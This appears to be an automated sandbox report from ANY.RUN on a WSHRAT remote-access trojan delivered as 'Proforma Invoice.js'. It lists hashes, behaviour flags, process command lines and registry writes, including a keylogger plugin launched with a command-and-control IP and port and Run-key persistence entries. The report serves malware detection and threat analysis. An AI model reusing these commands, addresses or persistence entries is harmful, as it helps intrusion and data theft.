General Info

File name

Proforma Invoice.js

Full analysis
https://app.any.run/tasks/1dea8e86-f054-466c-9e52-49efefff2adb
Verdict
Malicious activity
Analysis date
11/8/2019, 18:08:34
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

evasion

trojan

stealer

wshrat

Indicators:

MIME:
text/plain
File info:
ASCII text, with very long lines
MD5

e11c4858c73a9f7fc1e62d56997c596b

SHA1

da96c83b3c5b749d8dff9c5bae4b41a62e757738

SHA256

22d987eb8983590955a24c3458dfd18f192bb1dbd91e82f99a5da47d7248c866

SSDEEP

3072:/NMxSBziU1HE3Jua5LKvD4Yp4m+XeutNeNs:lj1HECvsYmmmeE

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
120 seconds
Additional time used
60 seconds
Fakenet option
off
Heavy Evasion option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (75.0.3770.100)
  • Google Update Helper (1.3.34.7)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.7.2 (4.7.03062)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Groove MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Language Pack 2010 - French/Français (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - German/Deutsch (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Italian/Italiano (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Japanese/日本語 (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Korean/한국어 (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Portuguese/Português (Brasil) (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Russian/русский (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Spanish/Español (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Turkish/Türkçe (14.0.4763.1013)
  • Microsoft Office O MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Arabic) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Basque) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Catalan) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Dutch) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Galician) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (German) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Proof (Ukrainian) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (French) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (German) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office SharePoint Designer MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office X MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
  • Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
  • Mozilla Firefox 68.0.1 (x86 en-US) (68.0.1)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB4019990
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Application was dropped or rewritten from another process
  • kl-plugin.exe (PID: 2236)
Writes to a start menu file
  • wscript.exe (PID: 952)
  • WScript.exe (PID: 1856)
Connects to CnC server
  • wscript.exe (PID: 952)
Changes the autorun value in the registry
  • wscript.exe (PID: 952)
  • WScript.exe (PID: 1856)
WSHRAT was detected
  • wscript.exe (PID: 952)
Connects to unusual port
  • wscript.exe (PID: 952)
Creates files in the user directory
  • WScript.exe (PID: 1856)
  • wscript.exe (PID: 952)
Starts CMD.EXE for commands execution
  • wscript.exe (PID: 952)
Executable content was dropped or overwritten
  • wscript.exe (PID: 952)
Executes scripts
  • WScript.exe (PID: 1856)
Checks for external IP
  • wscript.exe (PID: 952)
Uses TASKKILL.EXE to kill process
  • cmd.exe (PID: 4028)
Application launched itself
  • WScript.exe (PID: 1856)

No info indicators.

Processes

Total processes
40
Monitored processes
5
Malicious processes
2
Suspicious processes
0

Behavior graph

start drop and start wscript.exe #WSHRAT wscript.exe cmd.exe no specs taskkill.exe no specs kl-plugin.exe

Process information

PID
1856
CMD
"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Proforma Invoice.js"
Path
C:\Windows\System32\WScript.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft ® Windows Based Script Host
Version
5.8.7600.16385
Modules
Image
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sxs.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\jscript.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\msisip.dll
c:\windows\system32\wshext.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\scrobj.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\msxml3.dll
c:\program files\common files\system\ado\msado15.dll
c:\windows\system32\msdart.dll
c:\windows\system32\mlang.dll
c:\windows\system32\wbem\wbemdisp.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbem\wmiutils.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\psapi.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\sspicli.dll

PID
952
CMD
"C:\Windows\System32\wscript.exe" "C:\Users\admin\AppData\Roaming\Proforma Invoice.js"
Path
C:\Windows\System32\wscript.exe
Indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft ® Windows Based Script Host
Version
5.8.7600.16385
Modules
Image
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sxs.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\jscript.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\msisip.dll
c:\windows\system32\wshext.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\scrobj.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\msxml3.dll
c:\program files\common files\system\ado\msado15.dll
c:\windows\system32\msdart.dll
c:\windows\system32\mlang.dll
c:\windows\system32\wbem\wbemdisp.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbem\wmiutils.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\wship6.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\users\admin\appdata\roaming\kl-plugin.exe

PID
4028
CMD
"C:\Windows\system32\cmd.exe" /c taskkill /F /IM kl-plugin.exe
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
wscript.exe
User
admin
Integrity Level
MEDIUM
Exit code
128
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
1880
CMD
taskkill /F /IM kl-plugin.exe
Path
C:\Windows\system32\taskkill.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
128
Version:
Company
Microsoft Corporation
Description
Terminates Processes
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\taskkill.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\version.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\mpr.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\winsta.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll

PID
2236
CMD
"C:\Users\admin\AppData\Roaming\kl-plugin.exe" 79.134.225.103 7775 "WSHRAT|C4BA3647|USER-PC|admin|Microsoft Windows 7 Professional |plus|nan-av|false - 8/11/2019|JavaScript-v2.3|IT:Italy" 1
Path
C:\Users\admin\AppData\Roaming\kl-plugin.exe
Indicators
Parent process
wscript.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
WSHRat Plugin
Description
klplu
Version
1.1.0.0
Modules
Image
c:\users\admin\appdata\roaming\kl-plugin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\system32\shell32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\profapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.drawing\dbfe8642a8ed7b2b103ad28e0c96418a\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.windows.forms\3afcd5168c7a6cb02eab99d7fd71e102\system.windows.forms.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.visualbas#\08d608378aa405adc844f3cf36974b8c\microsoft.visualbasic.ni.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll

Registry activity

Total events
593
Read events
542
Write events
51
Delete events
0

Modification events

PID
Process
Operation
Key
Name
Value
1856
WScript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Proforma Invoice
false - 8/11/2019
1856
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Proforma Invoice
wscript.exe //B "C:\Users\admin\AppData\Roaming\Proforma Invoice.js"
1856
WScript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Proforma Invoice
wscript.exe //B "C:\Users\admin\AppData\Roaming\Proforma Invoice.js"
1856
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
1856
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
952
wscript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Proforma Invoice
wscript.exe //B "C:\Users\admin\AppData\Roaming\Proforma Invoice.js"
952
wscript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Proforma Invoice
wscript.exe //B "C:\Users\admin\AppData\Roaming\Proforma Invoice.js"
952
wscript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wscript_RASAPI32
EnableFileTracing
0
952
wscript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wscript_RASAPI32
EnableConsoleTracing
0
952
wscript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wscript_RASAPI32
FileTracingMask
4294901760
952
wscript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wscript_RASAPI32
ConsoleTracingMask
4294901760
952
wscript.exe
write
